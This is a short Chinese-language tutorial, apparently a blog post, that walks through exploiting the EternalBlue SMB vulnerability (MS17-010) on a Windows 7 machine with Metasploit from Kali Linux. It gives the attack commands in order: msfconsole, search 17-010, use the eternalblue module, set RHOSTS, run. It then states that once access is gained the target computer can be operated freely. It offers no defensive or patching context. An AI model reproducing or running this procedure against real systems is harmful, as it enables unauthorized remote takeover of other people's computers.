第一步需要kali系统的电脑和win7系统电脑的ip的地址在同一网段,互相之间可以ping通。
第二步关闭win7系统的防火墙。
往往失败就是这两部分的错误。
下边开始进入正题。
打开我们的kali系统,永恒之蓝控制版面开启指令 :msfconsole
小马图像是随机出现的,不是固定的,所以出现别的页面也属于正常。
之后输入search 17-010.会出现5个攻击模块。
他们的意思分别是
0 exploit/windows/smb/ms17_010_eternalblue (利用漏洞/windows/smb/ms17_010_永恒蓝)
1 exploit/windows/smb/ms17_010_psexec (利用/windows/smb/ms17_010_psexec)
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution(辅助/admin/smb/ms17_010_命令2017-03-14正常无ms17-010 EternalRoman/EternalSynergy/EternalChampion smb远程Windows命令执行)
3 auxiliary/scanner/smb/smb_ms17_010 (辅助/扫描仪/smb/smb_ms17_010)
4 exploit/windows/smb/smb_doublepulsar_rce (利用/windows/smb/smb\u doublepulsar\u rce)
显然我们所要使用的是 0模块(利用永恒之蓝漏洞)
use 选择使用的模块
我们这个时候需要设置目标 set RHOSTS ip
最后一步 run
拿到权限后就能随意对目标电脑进行操作了。